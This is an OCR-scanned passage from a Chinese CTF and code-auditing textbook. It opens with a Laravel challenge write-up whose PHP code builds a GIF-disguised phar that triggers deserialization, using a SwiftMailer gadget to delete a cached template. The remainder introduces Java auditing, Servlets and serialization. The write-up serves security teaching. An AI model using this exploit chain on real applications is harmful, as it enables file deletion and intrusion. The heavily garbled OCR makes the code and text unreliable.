了 ， 页 面 却 没有 显示 ”， 这 都 是 因为 Laravel 的 模版 缓存 。 所 以 接 下 来 需要 更 改 flag 的 模版 缓存 ， 缓 存 
文件 的 名 字 是 Laravel 自 动 生成 的 。 生 成 方法 如 下 : 


/* 
* Get the path to the compiled version of a view. 


* @param string $path 
* @return string 


*/ 
public function getCompiledpath($path) { 

return $this->cachepath.'/'.shal($path).'.php’'; 
} 


所 以 现在 需要 删除 flag 路 由 对 应 的 blade 缓 存 ， 但 是 整个 题目 的 罗 辑 很 简单 ， 没 有 其 他 文件 操作 的 地 
方 ， 只 有 UploadController 控 制 器 可 以 上 传 图 片 。 但 是 有 一 个 方法 引起 了 笔者 的 兴趣 : 


public function check(Request $request) { 
$path = $request->input('path', $this->path); 
$filename = $request->input('filename’', null); 
if($filename) { 
if(!file_exists($path . $filename)) { 
FLash: :error(' 磋 盘 文件 已 删除 ， 刷 新 文件 列表 :7 ; 
} 
else{ 
FLash: :success(' 文 件 有 效 '); 
} 
} 
return redirect(route('files')); 
} 


path 跟 filename 没 有 任何 过 滤 ， 所 以 可 以 利用 file_exists 去 操作 phar 包 ， 明 显存 在 反 序 列 化 漏洞 ， 于 
是 现在 的 思路 很 明确 : phar 反 序列 化 一 文件 操作 删除 或 者 移 除 一 laravel 重 新 泻 染 blade 一 读 取 flag。 


通过 查看 composer 引 入 的 组 件 ， 友 现 都 是 默认 组 件 ， 于 是 全 局 搜索 “unlink”， 在 Swift_ 


ByteStream 
_TemporaryFileByteSstream 析 构 函 数 中 存在 unlink() 函 数 可 以 删除 任意 文件 ， 见 图 10-1 -3 


getPatn 


getPath 
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图 10-1-35 
具体 pop 链 的 构造 在 此 不 过 多 赣 述 ， 利 用 代码 如 下 : 


<?php 

class Swift_ByteStream_AbstractFiLterabLeInputStream { 
/** 
* Write sequence. 
人 


protected $sequence = 0; 


病 刘 
* StreanFilters. 
w Ovar Swift_StreamFiUter[] 


a 
private $filters = []; 
bid 

* A buffer for writing. 


Ee 
private S$writeBuffer = 

/a 

* Bound streams. 

w Ovar Swift_InputByteStream[] 


a#/ 
private $mirrors = []; 


} 
class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream { 
// The internal pointer offset 
private $_offset = 0; 
/1/ The path to the file 
private $_path; 
e mode this file is opened in for writing 
private $_mode; 
// A lazy-loaded resource handle for reading the file 
private $_reader; 
// A lazy-loaded resource handle for writing the file 
private $_writer; 
// IF magic_quotes_runtime is on, this will be true 
private $_quotes = false; 
/i IF stream is seekable true/false, or null if not known 
private $_seekable = null; 
J 
* Create a new FileByteStrean for $path. 
* Oparan string Spath 
* @paran bool Swritable if true 
aa/ 
public function __construct($path, S$writable = false) { 
$this->_path = $path; 
Sthis->_node = S$writable ? ‘wb' : ‘rb'; 
if (function_exists('get_magic_quotes_runtinme') 55 fget_magic_quotes_runtime() == 1) { 
Sthis->_quotes = true; 
} 
} 


和 
w Get the complete path to the file. 
w freturn String 
a/ 

public function getPpath() { 

return $this->_path; 
} 


} 
class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStrean { 


public function __construct() { 
$filepath="/usr/share/nginx/html/storage/framework/views/3Hedldf0934a7543787326dcd28e2d835bc38772.php"; 
parent::__construct($filePath, true); 
} 
public function __destruct() { 
if (file_exists($this->getPath())) { 
@unlink($this->getPpath()); 


} 

$obj = new Swift_ByteStream_TemporaryFileByteStream(); 
$p = new Phar('./1.phar', 0); 

$p->startBuffering(); 

$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>'); 
$p->setMetadata($0bj); 

$p->addFromString('1.txt', 'text'); 
$p->stopBuffering(); 

rename('./1.phar', '1.gif'); 


然后 上 传 图 片 ， 在 图 片 check 的 时 候 触 友 反 序列 化 删除 缓存 的 模版 文件 ， 然 后 访问 flag 路 由 拿 到 flag, 
见 图 10-1-36。 


加 不 安全 | 494.64.118:31637/1lag 


fagtc4f6716eoef6c808c355cda44ccfa424| 


10-1-36 
可 以 实现 RCE， 读 者 不 妨 将 代码 下 载 到 本 地 实验 。 
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10.2 Java 代 码 审 计 


10.2.1 学 习 经 验 


对 于 Web 方 向 的 参赛 者 来 说 ，Java 永 远 是 “最 的 悉 的 陌 生 人 ”。 陌 生 点 在 于 ，Java 庞 大 的 结构 和 纷繁 
复 玉 的 特性 往往 让 人 望而却步 ， 提 不 起 任何 兴趣 去 研究 这 个 不 那么 “简单 直观 ”的 语言 。 熟 悉 点 在 
于 ， 现 在 市 面 上 绝 大 多 数 的 Web 框 以 或 多 或 少 参考 了 Java Web 的 设计 模式 ;而 同时 在 真实 世界 中 所 
能 碰 到 的 环境 有 很 多 都 是 Java Web 环 境 ， 而 非 PHP、.NET 等 其 他 环境 。 本 节 主 要 分 享 笔者 从 零 开 始 
学 习 Java 审 计 的 一 些 经 历 ， 希 望 对 读者 有 所 帮助 。 


1. 如 何 开始 
笔者 学 习 Java 审 计 纯 粹 靠 着 两 个 字 : “ 死 夺 ”.。 


近年 各 大 安全 论坛 上 有 关 Java 安 全 的 文章 日 益 增 多 ， 可 以 参考 的 吹 料 也 越 来 越 多 ， 这 些 资料 对 于 Java 
安全 的 学 习 是 非常 有 帮助 的 。 但 是 在 笔者 刚 开始 接触 Java 安 全 的 时 候 ， 相 关 文 章 并 不 多 ， 其 他 种 类 的 
资料 也 是 少 得 可 怜 ， 从 零 到 入 门 着 实 伦 了 不 少 的 力气 ， 这 个 过 程 中 全 和 赁 着 “ 死 太 ”， 硬 着 头皮 去 看 代 
码 。 


很 多 人 在 开始 学 习 Java 审 计 前 总 会 陷入 一 个 思维 误区 一 一 要 先 学 完 Java 的 相关 知识 ， 之 后 才能 开始 进 
行 Java 的 审计 。 从 某 一 方面 来 说 ， 这 样 的 思路 是 没有 氏 的 ， 但 是 长 时 间 、 单 调 的 Java 学 习 会 消磨 把 审 
计 的 热情 ， 从 而 导致 很 多 人 半途 而 废 。 笔 者 对 于 这 个 问题 的 看 法 是 “Do it，then know it.”， 即 边 
做 边 学 。 如 果 在 刚 开始 上 手 的 时 候 就 扔 给 你 一 本 厚 厚 的 Java 开 发 书 ， 要 求 从 头 开始 看 ， 即 使 你 能 顺利 
= l= [DN = 
看 书 中 所 学 到 的 东西 过 于 空洞 ， 甚 至 不 知道 真实 场景 下 的 具体 分 析 应 该 从 哪里 开始 。 所 以 笔者 推荐 初 
AEE NN EE EE AA EY Et 
什么 ， 在 通过 学 习 尝 试 解 决 相应 问题 后 再 进行 忌 结 ， 这 种 方式 的 学 习 效 率 是 非常 高 的 。 


肯定 有 很 多 朋友 在 尝试 开始 进行 Java 审 计 分 析 的 时 候 遇 到 过 非常 多 的 环境 问题 ， 因 为 第 一 次 接触 Java 
开发 ， 搞 不 清楚 如 何 配置 环境 ， 常 常 遇 到 : 如 何 利 用 Maven 构 建 项 目 ? 如 何 把 项 目 部 署 到 Tomcat 中 
然后 启动 项 目 ? 如 何 反 编译 JAR 包 看 源码 ? 如 何 进 行动 态 调试 ?等 等 问题 。 干 万 不 要 被 这 些 必须 踩 的 
“ 坑 ” 给 劝 退 了 ! 这 些 填 是 只 要 亲自 经 历 过 一 次 就 不 会 再 踩 第 二 次 的 ， 所 以 一 定 要 稳 住 心态 ， 通 过 查 
资料 等 方式 慢 慢 搞 懂 即 可 。Java 的 学 习 就 是 这 样 ， 慢 工 出 细 活 ， 这 也 是 这 杯 “咖啡 ” 越 来 越 香 浓 的 原 
因 。 


2. 入 门 


当 你 踩 过 一 定数 量 的 、 看 似 与 Java 安 全 没有 关系 的 环境 配置 的 “ 坑 ” 后 ，“ 万 里 长 征 ” 才 开始 了 第 一 
步 。 接 下 来 ， 你 需要 做 的 是 大 量 复 现 并 分 析 已 经 曝 出 的 漏洞 。 高 质量 的 漏洞 分 析 是 提升 自己 技能 的 最 
简单 、 最 直接 的 方式 。Java 的 审计 非 营 注 重 知 识 的 积累 ， 如 果 你 没有 一 步 步 调试 分 析 过 ， 融 很 难 知道 
为 什么 能 这 么 做 ， 所 以 建议 尽量 多 地 分 析 大 型 的 开源 项 目的 漏洞 ， 如 >truts2、Jenkins 等 ， 同 时 学 习 
一 些 利 用 链 ， 如 分 析 ysoserial 中 的 反 序 列 化 利用 链 、JNDI 利 用 流程 等 。 在 分 析 的 过 程 中 多 问 为 什么 ， 
尽 上 自己 所 能 地 去 解释 清楚 整个 漏洞 的 调用 链 ， 同 时 兰 试 动手 写 出 自己 的 poc。 


在 进行 大 量 漏洞 分 析 工 作 的 同时 ， 要 让 自己 的 思路 跳出 过 于 细节 的 执行 流程 中 ， 从 整体 层面 去 思考 框 
架 是 如 何 实现 这 个 流程 的 ， 这 个 过 程 在 框架 中 到 | 底 发 生 了 什么 ， 自 己 能 否 将 执行 流 的 每 个 步骤 都 能 
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释 清 楚 。 如 此 往复 ， 你 慢 慢 就 会 对 框架 的 设计 模式 有 所 了 解 。 简 单 来 说 就 是 熟 能 生 巧 ， 最 容易 说 明 的 
例子 就 是 你 是 否 能 看 懂 Struts2 的 框架 执行 流程 。 当 你 能 独立 的 完成 漏洞 分 析 后 ， 不 妨 尝 试 对 最 新 爆 出 
的 漏洞 进行 及 时 的 分 析 ， 通 过 大 量 的 漏洞 分 析 逐 渐 完 善 自己 对 于 Java 审 计 的 认识 。 至 此 ， 才 算是 入 
[ols 


3. 进一步 学 习 


相信 此 时 有 了 一 定 知 识 积累 的 你 会 逐渐 发 现 你 所 分 析 过 的 漏洞 好 像 都 有 一 种 特定 的 模式 或 者 说 是 特定 
的 关系 ， 并 且 冤 得 自己 越 学 越 菜 ， 那 么 茶 喜 你 ， 终 于 “ 初 登 贼 船 ”。 


这 时 可 以 开始 深入 了 解 一 些 Java 的 运行 机 制 和 设计 模式 的 内 容 。 在 追寻 那 种 特定 天 系 的 途中 ， 你 会 
始 深 入 了 解 如 Java 动 态 代理 、Java 类 加 载 机 制 等 内 容 ， 这 些 内 容 束 像 树 的 根 一 样 ， 无 论 框 架 是 怎样 
:HP = 
在 哪里 、 人 在 干什么 。 


无 论 是 漏洞 挖掘 还 是 漏洞 利用 ， 都 会 不 停 地 重复 上 述 过 程 ， 不 断 地 进行 积累 。 量 变 引起 质变 ， 这 对 于 
的 分 析 研 究 来 说 同样 成 立 。 


10.2.2 环境 搭建 


环境 搭建 、 代 码 查看 的 常用 工具 ， 笔 者 推荐 IntelliJj IDEA， 源 码 、 软 件 包 、 远 程 程序 等 都 可 以 用 其 进 
行 调试 。 使 用 IDEA 新 建 一 个 test 项 目 ， 选 择 “File 一 New 一 Project” 菜 单 命令 ( 见 图 10-2-1) ， 在 
弹出 的 对 话 框 中 选择 “sdk”， 即 安装 好 的 Java 路 径 ( 见 图 10-2-2) ， 然 后 单 击 “Next” 按 钮 。 这 里 
选择 “hello world” 的 实例 程序 ( 见 图 10-2-3) ， 其 实 只 是 多 了 一 个 Main 类 并 且 输 出 了 “hello 

， 指定 项 目 路 径 ， 并 输入 项 目 名 称 ， 见 图 10-2-4。 完 成 后 会 生成 的 界面 见 图 10-2-5。 


而 ntellij IC 


Project from Existing Sources... 
Project from Version Control 
Module... 

Module from Existing Sources... 
Ctrl+Alt+S |@ Java Class 


4 


~ OOArquilian JUnit 
DOArquillian TestNG 
口 归 JBoss Drools 

国 Java EE 


加 New Project 


Create project from template 


WW Command Line App 


图 10-2-3 
加 New Project 
Project name: 
Project location: | O:\workVava\test\test 
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图 10-2-4 


篇 test [OVworkVjava\test\test] - -VsrcVMainjava ftest] - IntelEU IDEA 
Fle Edt Yiew Navigate Code Analyze Befactor Build Run Iools VCS Window Help 
Wy test ) msrc) B Main) 


Project ~ OO Minjva 
v Wve ONworkjavaNiesfVest 1 pul 
> ides 
src 
局 testiml 
Y MExternal Libraries 
> 18> 


< back-upVava 
辐 Scratches and Consoles 


图 10-2-5 


如 果 引 入 依赖 包 ， 则 可 以 直接 在 test 目 录 下 新 建 libs 目 录 ， 放 入 依赖 JAR 包 ， 然 后 在 项 目 设置 中 配置 依 
赖 目 录 ( 见 图 10-2-6 和 图 10-2-7) ， 再 选择 libs 目 录 (可 以 新 建 ) ， 见 图 10-2-8。 


图 10-2-6 


10-2-7 
秽 Attach Files or Directories 
Select files or directories in which library classes, sources, documentation or native libraries are located 


全 加 上 师 且 | 上 X SG Hide path 
O:\workVava\test\test 4 


> Mmaven dependencies 
v Mtest 


> MM.idea 
> libs 
> Msrc 
> bs 
> oma 
> Mjetbrain 
> be 


Drag and drop a file into the space above to quickly locate it in the tree 
crea 
AD | 
10-2-8 


此 时 可 以 调试 一 些 程序 ， 将 程序 所 有 的 JAR 包 放 入 libs 目 录 ， 然 后 配置 调试 信息 ， 见 图 10-2-9 和 图 10- 
2-10。 选 择 一 种 服务 器 配置 或 者 直接 指定 运行 的 JAR 包 ， 具 体 配 置 可 以 自行 查询 。 


如 调试 weblogiG 局 洞 ， 就 将 weblogic 所 有 的 JAR 包 导入 libs 文 件 ， 并 且 配 置 好 调试 信息 ， 设 置 断 点 ; 
然后 单 击 IDEA 右 上 角 的 “debug” 按钮 ， 就 可 以 开始 调试 。 


一 些 常 用 快捷 键 (Windows 环 境 ) 如 下 : 
F4， 变 量 、 消 数 追 踪 。 
学 Ctrl+H， 查 看 继承 关系 。 


们 Ctrl+ Shift+N， 查 找 当前 工程 下 的 文件 。 


Main v 
Edit Configurations... 


忆 Save 'Main' Configuration 
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图 10-2-9 
钉 Run/Debug Configurations 
+ 一 有 四 帮 生 本 二 
Add New Configuration 


kt) Arqulllhan lestNG 
馈 Attach to Node.js/Chrome 


| 站 JAR Application 
BB Java>cnpt Debug 
. JBoss Server 
. 


例 Spy-js for Nodejs 
5 TestNG 


局 Tomcat Server > 
图 WebLogic Server > 


XSLT 


图 10-2-10 


10.2.3 肥 编 译 工具 


1. Fernflower 


Fernflower 是 IDEA 中 目 市 的 反 编 译 器 ， 代 码 友 好 ， 又 持 图 形 化 界面 。 参 考 网 址 : AL 本 
ecode 
.Club/showthread.php? tid= 5。 基 本 命令 如 下 : 


java -jar fernfLower .jar jarToDecompile.jar decomp/ 


其 中 ，jarToDecompileJjar 代 表 需 要 反 编 译 的 JAR 包 ，decomp 代 表 反 编译 结果 的 人 存放 目录 。 


2. JD-GUI 


Java decompiler 也 是 一 款 被 众多 安全 从 业 人 员 认 可 的 反 编 译 工具 ， 具 有 图 形 化 界面 ， 人 
。 选 择 “File 一 Open File” 菜 单 命令 ， 然 后 选择 需要 反 编 译 的 JAR、WAR 文 件 ， 见 图 10-2-12。 


“> Java Decompiler 
File Edit Navigation Search Help 
Open File... Ctrl+O 


Close Ctrl+W 


Save Ctrl+S 
Save Al Sources Ctrl+Alt+S 


Recent Files 
Exit 
图 10-2-11 
File Edit Navigation Search Help 


Bbea_wls9_async_response. war 2 


由 -中 META-INF 
电 - 中 WEB-INF 
由 .所 META-INF /schemas 
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出 weblogic. wsee. async 
" DE 
由 四 AsyncResponseBean 
H-t AsyncResponseBeanPortType. class 
AsyncResponseBeanSoapl2. class 


由 : 


由 :了 他 AsyncResponseBeanSoapl2PortType. class 
一 四 AsyncResponseService-annotation. xml 

一 办 AsyncResponseService.wsdl 

二 办 AsyncResponseService. xml 

一 四 AsyncResponseServiceSoap12-annotation. xml 


i AsyncResponseServiceSoapl2.wsdl 
: AsyncResponseServiceSoapl2. xml 
[0 web. xml 


一 四 weblogic-webservices-policy. xml 
一 四 weblogic-webservices. xml 

[0 weblogic. xml 

i webservices. xml 


图 10-2-12 


10.2.4 Servlet 简 个 


servlet 是 Sun 公 司 制定 的 一 种 用 来 扩展 Web 的 服务 器 功能 的 组 件 规范 〈 服 务 器 的 Java 应 用 程序 ) ， 具 
有 独立 于 平台 和 协议 的 特性 ， 可 以 生成 动态 的 Web 页 面 ， 担 当 客户 请 求 (Web 浏 览 器 或 其 他 HTTP 客 
户 程序 ) 与 服务 器 响应 (HTTP 服务 器 上 的 数据 库 或 应 用 程序 ) 的 中 间 层 。 


代表 Java Web 的 脚本 语言 是 JSP， 但 是 Java 虚 拟 机 只 会 对 class 文 件 进 行 解析 ， 那 么 JSP 脚 本 是 怎么 解 
析 的 呢 ? 这 就 涉及 JSP 与 Servlet 的 联系 了 。JSP 经 过 Web 容 器 解释 编译 后 是 Servlet 的 子 类 ，JSP 更 擅 
长 页 面 展示 功能 ， 而 Servlet 更 擅长 后 端 逻 辑 控制 |。 


1. Servlet 的 生命 周期 


Java Web 生 命 周 期 的 基础 是 建立 在 Servlet 的 生命 周期 上 的 ， 无 论 是 最 简单 的 JSP 项 目 还 是 使 用 了 _ 
(如 Spring MVC) 设计 模式 的 Web 框 染 ， 核 心 的 内 容 都 是 Servlet 生 命 周 期 。 了 解 Servlet 的 生命 周 


期 有 助 于 我 们 更 好 地 理解 Java Web 对 一 个 访问 请 求 的 执行 流程 。 


服务 器 在 收 到 客户 端的 访问 请 求 后 ，Servlet 由 Web 容 器 调用 。 首 先 ，Web 容 器 检查 是 否 已 经 装载 了 
客户 端 请 求 所 指定 访问 的 Servlet (Servlet 可 以 根据 web.xml 配 置 访问 路 径 ) ， 如 果 未 装载 ， 则 进行 
搬 载 并 急 始 化 Servlet， 调 用 Servlet 的 init() 国 数 。 如 果 已 经 妆 载 ， 则 直接 新 建 一 个 3ervlet 对 象 ， 并 且 
将 消息 请 求 封装 进 HttpServletRequest 中 ， 将 服务 器 返回 信息 封装 进 HttpServletResponse 中 。 
HttpServletRequest 
和 HttpServletResponse 作 为 参数 传递 给 即将 调用 的 Servlet 的 service() 冰 数 ， 此 后 
由 servlet 对 消息 请 求 做 一 些 逻 辑 控 制 ， 直 全 Web 容器 被 停止 或 重新 局 动 。 ee . 
estroy 
0 辫 数 并 乞 载 该 Servlet。 这 个 过 程 的 大 致 生 命 周 期 为 : init(0 一 service( 一 destroy()。 


Servlet 定 义 了 两 个 默认 实现 类 : GenericServlet 和 HttpServlet。HttpServlet 是 GenericServlet 的 
子 类 ， 专 门 处理 HTTP 请 求 ， 一 般 不 用 开 上 者 重 写 service() 为 数 ， 因 为 HttpServlet 的 service() 国 数 实 
现 了 判断 用 户 的 请 求 类 型 。 如 果 客 户 痊 请 求 类 型 是 GET 类 型 ， 则 调用 doGet(0 上 六 数 ; 如 果 是 POST 类 
型 ， 则 调用 doPost(0) 阔 数 等 。 只 需 实 现 do* 类 型 函数 就 可 以 实现 逻辑 控制 。 


2. Servlet 部 署 


首先 编写 一 个 Servlet 实 例 ， 代 码 如 下 : 


import java.io.*; 
import javax.servlet.*; 
import javax.servlet.http.*, 


public class HelloWorld extends HttpServlet { 
private String message; 


public void init() throws ServletException { 
System.out.println("initial"); 
} 
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public void doGet(HttpServletRequest request，HttpServLetResponse response) 
throws ServletException, IOException { 
response.setContentType("text/html"); 
PrintWriter out = response.getWriter(); 
out.println("<hl>HellowWorld</h1>"); 


public void destroy() { 
System.out.println("destroy"); 
J 
} 


Servlet 在 进行 初始 化 和 停止 服务 器 被 摧毁 时 ， 会 在 服务 痛 分 别 输出 initial 和 destroy， 客 户 痊 浏览 有 
访问 时 会 返回 HellowWorld 字 符 串 的 页 面 。 


现在 可 以 用 IDEA 将 该 Servlet 布 置 到 Tomcat 中 (具体 方法 请 查阅 相关 文献 ) ， 但 是 此 时 我 们 访问 不 到 
这 个 Servlet。Java Web 不 像 Apache 下 PHP 的 配置 ， 只 需 把 PHP 文 件 放 入 Web 目 录 就 可 解析 ， 而 需 
要 配置 Servlet 访 问 路 径 ， 配 置 文件 名 是 web.xml， 路 径 企 WEB-INF 中 。 


<web-app> 
<servlet> 
<servlet-name>HelloWorld</servlet-name> 
<servlet-class>HelloWorld</servlet-class> 
</servlet> 


<servlet-mapping> 
<servlet-name>HelloWorld</servlet-name> 
<url-pattern>/HelloWorld</url-pattern> 
</servlet-mapping> 
</web-app> 


将 如 上 代码 写 入 web.xml， 通 过 http://localhost: 8080/HelloWorld 可 以 访问 到 该 Servlet。 


10.2.5 Serializable 简 介 


Java 实 现 序 列 化 机 制 的 工具 是 Serializable， 通 过 有 序 的 格式 或 者 字 节 序列 持久 化 Java 对 象 ， 序 列 化 
的 数据 中 包 仿 对象 的 类 型 和 属性 值 。 


如 果 我 们 已 经 序列 化 了 一 个 对 象 ， 那 么 这 个 序列 化 的 信息 可 以 被 读 取 ， 并 根据 对 和 象 的 类 型 和 规定 好 的 
格式 进行 反 序列 化 ， 最 终 可 以 获取 序列 化 时 状态 的 对 象 。 


“持久 化 ”意味 着 对 象 的 “生存 时 间 ” 并 不 取决 于 程序 是 否 正 在 执行 ， 它 存在 或 “生存 ”于 程序 的 每 
次 调用 之 间 。 序 列 化 一 个 对 象 ， 将 其 写 入 磁盘 ， 以 后 在 程序 再 次 调用 时 重新 恢复 那个 对 象 ， 就 能 间接 
实现 一 种 “持久 ”效果 . 


Serializable 工 具 的 简单 说 明 如 下 : 
学 对 象 的 序列 化 处 理 非 党 简单， 只 需 对 象 实现 了 Serializable 接 口 即 可 。 
学 序列 化 的 对 象 可 以 是 基本 数据 类 型 、 集 合 类 或 者 其 他 对 象 。 
学 使 用 transient、static 天 键 字 修饰 的 属性 不 会 被 序列 化 。 
类 不 可 序列 化 时 ， 需 要 父 类 中 存在 无 参 构造 冰 数 。 


相 天 接口 及 类 如 下 : 


java.io.Serializable 

java.io.Externalizable // 该 接口 雪 要 实现 writeExternal 和 readExternal 函数 控制 序列 化 
ObjectOutput 

ObjectInput 

ObjectOutputStream 

ObjectInputStream 


序列 化 的 步 又 如 下 : 


// 首先 创建 OutputStream 对 象 

OutputStream outputStream = new FileOutputStream("serial"); 

// 和 将 其 封装 到 ObjectOutputStreanml 对 象 中 

ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream); 
// 此 后 调用 writeObject(]) 即 可 完成 对 象 的 序列 化 ， 并 将 其 发 送 给 OQutputStream 
objectOutputStream.writeObject(Object); // 该 Object 代 指 任何 对 象 

// 最 后 关闭 资源 

objectOutputStream.close(), outputStream.close(); 
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反 序 询 化 的 步骤 如 下 : 


// 首先 创建 某 些 OutputStream 对 象 

InputStream inputStream= new FileInputStream("serial ") 

// 将 其 封装 到 ObjectInputStream 对 象 中 

ObjectInputStream objectInputStream= new ObjectInputStream(inputStream); 
// 此 后 只 需 调用 read0bject(] 即 可 完成 对 象 的 反 序 列 化 
objectInputStream.readObject(); 

// 最 后 关闭 资源 

objectInputStream.close(), inputStream.close(); 


1. Serializable 接 口 示例 


一 般 ， 一 个 类 只 需 继承 Serializable 接 口 ， 束 表示 该 类 和 其 子 类 都 能 够 进行 JjDK 的 序列 化 。 例 如 : 


import java.io.*; 
public class SerialTest { 


public static class UInfo implements Serializable{ 
private String userName; 
private int userAge; 


private String userAddress; 


public String getUserName() { return userName; } 
public int getUserAge() { return userAge; } 
public String getUserAddress() { return userAddress; } 


public void setUserName(String userName) { this.userName = userName; } 
public void setUserAge(int userAge) { this.userAge = userAge; } 
public void setUserAddress(String userAddress) { this.userAddress = userAddress; } 


} 


public static void main(String[] arg) throws Exception{ 
UInfo userInfo = new UInfo(); 
userInfo.setUserAddress("chengdu"); 
userInfo.setUserAge(21); 
userInfo.setUserName("orich1"); 


OutputStream outputStream = new FileOutputStream("serial"); 
ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream); 
objectOutputStream.writeObject(userInfo); 

objectOutputStream.close(); 

outputStream.close(); 


InputStream inputStream= new FileInputStream("serial "); 
ObjectInputStream objectInputStream= new ObjectInputStream(inputStream); 
UInfo unseriaLUinfo = (UInfo) objectInputStream.readObject(); 
objectInputStream.close(); 

inputStream.close(); 


System.out.println("userinfo:"); 

System.out.println("uname: " + UnserialUinfo.getUserName()); 
System.out.println("uage: " + unserialUinfo.getUserAge()); 
System.out.println("uaddress: " + unserialUinfo.getUserAddress()); 


输出 结果 如 下 : 


userinfo: 

uname: orichl 
uage: 21 
uaddress: chengdu 


在 工程 目录 下 会 生成 一 个 serial 文 件 ， 其 内 容 就 是 序列 化 后 的 数据 。 
2 . Externalizable 接 口 


除了 Serializable 接 口 ，Java 还 提供 了 另 一 个 序列 化 接口 Externalizable ， 该 接口 继承 自 Serializable 
接口 ， 但 是 有 两 个 抽象 滔 数 : writeExternal 和 readExternal。 开 友人 员 需 要 上 自行 实现 这 两 个 为数 来 控 
制 序列 化 流程 ， 如 果 不 实 现 遂 数控 制 逻 辑 ， 那 么 目标 序列 化 类 的 属性 值 会 是 类 初始 化 过 后 的 默认 值 。 


注意 ， 在 使 用 Externalizable 接 口 实现 序列 化 时 ， 读 取 对 象 会 调用 目标 序列 化 类 的 无 参 构造 滔 数 去 创 
建 一 个 新 的 对 象 ， 再 将 序列 化 数据 中 的 类 属性 值 分 别 填充 到 新 对 象 中 。 所 以 ， 实 现 Externalizable 接 
口 的 类 必须 提供 一 个 public 属 性 的 无 参 构造 函数 。 


3. serialVersionUID 


目标 序列 化 类 中 有 一 个 隐藏 的 属性 : 


Java 庶 拟 机 判断 是 否 人 允许 序 列 化 数据 被 反 序 列 化 时 ， 不 仪 取决 于 类 路 径 和 功能 代码 是 否 一 改 ， 更 取决 
于 两 个 类 的 serialVersionU1D 是 否 一 致 。 


serialVersionUID 在 不 同 的 编译 器 中 可 能 有 不 同 的 值 ， 开 发 者 也 能 够 自行 在 目标 序列 化 类 中 提供 匡 
值 。 在 提供 serialVersionUID 固 定 值 的 情况 下 ， 只 要 序列 化 数据 中 的 serialVersionUID 和 程序 中 目标 
序列 化 类 中 的 serialVersionU1D 一 致 ， 即 可 成 功 反 序 列 化 。 如 果 没 有 自行 指定 serialVersionUID 的 固 
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定 值 ， 那 么 编译 器 会 根据 class 文 件 内 容 ， 通 过 一 定 的 算法 生成 它 的 什 ( 根 ER 
en 共生 的 考 当 蕉 人 


字段 ) ， 那 么 在 不 同 环境 下 ， 编 译 器 得 到 的 serialVersionUID 值 是 不 同 的 ， 就 会 导致 反 序 列 化 失败 。 
同 理 ， 改 变 目标 类 中 代码 也 可 能 影响 到 生成 的 serialVersionUID 值 ， 此 时 程序 会 抛 出 java.io 
[leeEESS eeaeilell 
， 并 且 指 出 serialVersionUI1D 不 一 致 。 


为 了 提高 serialVersionUID 的 独立 性 和 确定 性 ， 建 议 在 目标 序列 化 类 中 显示 定义 serialVersionUID， 
为 它 赋予 明确 的 值 。 


显 式 定 义 serialVersionUID 有 两 种 用 途 : Q@ 在 某 些 场合 ,希望 类 的 不 同 版 本 对 序列 化 兼容 ， 因 此 需要 
确保 类 的 不 同 版 本 具有 相同 的 serialVersionUID; OP Ed NS 
容 ， 因 此 需要 确保 类 的 不 同 版 本 具有 不 同 的 serialVersionUID。 


在 我 们 对 反 序 列 化 漏洞 利用 链 进行 构造 时 ， 也 需要 关注 serialVersionUID 的 变化 ， 有 可 能 对 Gadget 造 
成 一 定 影响 ， 如 CVE-2018-14667 (RichFaces Framework 框 架 任意 代码 执行 漏洞 ) 中 会 有 相关 问 
题 。 该 问题 的 解决 方法 很 简单 : 在 构造 Gadget 候 重 写 serialVersionUID 有 变化 的 类 ， 指 定 为 攻击 环境 
sel STElIMTST ED 


10.2.6 反 序 惠 化 漏 酒 


10.2.6.1 漏洞 概述 
1. 漏洞 背景 


2015 年 11 月 6 日 ，FoxGlove Security 安 全 团队 的 @breenmachine 发 布 了 一 篇 长 博客 ,前述 了 利用 
反 序 列 化 和 Apache Commons Collections 基 础 类 库 实现 远程 命令 执行 的 真实 案例 ， 各 大 Java 
服务 器 纷纷 “ 身 枪 ”， 这 个 漏 酒 模 扫 WebLogic、WebSphere、JBoss、Jenkins、 OpenNMS 的 最 

新 版 。 在 此 近 10 个 月 前 ，Gabriel Lawrence 和 Chris Frohoff 就 已 经 在 AppSecCali 上 的 一 个 报告 里 提 

到 了 这 个 漏洞 利用 思路 。 


2. 漏洞 解析 


漏洞 的 起 因 是 如 果 Java 程 序 对 不 可 信和 数据 做 了 友 序 列 化 处 理 ， 那 么 攻击 者 可 以 将 构造 的 恶意 序列 化 数 
据 输 入 程序 ， 让 反 序 列 化 过 程 产 生 非 预期 的 执行 流程 ， 以 此 来 达到 有 恶 意 攻 击 的 效果 。 


序列 化 束 是 把 对 得 的 状态 信息 转换 为 字 节 序列 ( 即 可 以 存储 或 传输 的 形式 ) 的 过 程 。 反 序列 化 即 序列 
化 操作 的 遂 过 程 ， 将 序列 化 得 到 的 字 书 流 还 原 成 对 象 。 


反 序 列 化 漏洞 的 利用 流程 是 首先 构造 恶意 的 序列 化 数据 ， 然 后 让 程序 去 执行 屎 意 序列 化 数据 的 反 序 列 
化 过 程 ， 利 用 程序 正常 的 解析 流程 去 控制 程序 执行 方向 ， 最 终 达 到 调用 敏感 函数 的 目的 。 


不 仅 Java 出 现 过 反 序 列 化 相关 的 漏洞 ， 其 他 语言 也 有 相似 的 问题 ， 如 PHP 反 序列 化 漏洞 等 ， 尽 管 可 能 
不 同 语言 对 这 种 漏洞 的 称呼 不 同 ， 但 是 漏洞 背后 的 原理 是 一 样 的 : 序列 化 可 以 看 做 “J 包 ” 数 据 的 过 
程 ， 反 序列 化 可 以 看 做 “ 解 包 ” 的 过 程 ， 为 了 实现 某 些 应 用 场景 ， 应 用 程序 会 操作 由 用 户 提 供 的 “ 打 
(NE: ES EP i EE 
序 的 操作 方 都 可 以 理解 为 用 尸 。 如 果 “ 解 包 ” 过 程 涉及 动态 销 数 调用 等 等 灵活 操作 ， 束 可 以 改变 原 有 
执行 流程 ， 达 到 恶意 攻击 的 效果 。Java 反 序列 化 漏洞 其 实 一 直 仓 在 ， 并 不 是 2015 年 后 才 及 生 。2012 
年 公开 的 利用 方式 影响 巨大 是 因为 在 非常 出 名 的 第 三 万 依赖 包 中 找到 了 利用 链 ， 这 样 束 能 影响 大 多 数 
